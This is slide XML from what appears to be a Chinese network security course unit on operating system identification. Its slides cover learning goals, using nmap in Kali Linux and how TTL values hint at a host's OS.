                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够了解系统识别基础知识。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够使用namp获取主机操作系统信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:t>本项目使用Kali  Linux操作系统中的nmap工具进行进行系统识别，获取主机操作系统信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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a:xfrm>
            <a:off x="5554701" y="1235799"/>
            <a:ext cx="5442585" cy="3629387"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5442585" cy="3629387"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4777105" cy="3415030"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 操作系统的识别技术多种多样，有简单的也有复杂的，最简单的就是用TTL值去识别。不同类型的OS默认的起始TTL值是不同的。例如，Windows的默认值是128，然后每经过一个路由，TTL值减1；Linux/UNIX的默认值是64，但有些特殊的UNIX默认值是255。此外，使用nmap工具可以同时对端口和服务进行扫描，识别操作系统和版本号。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
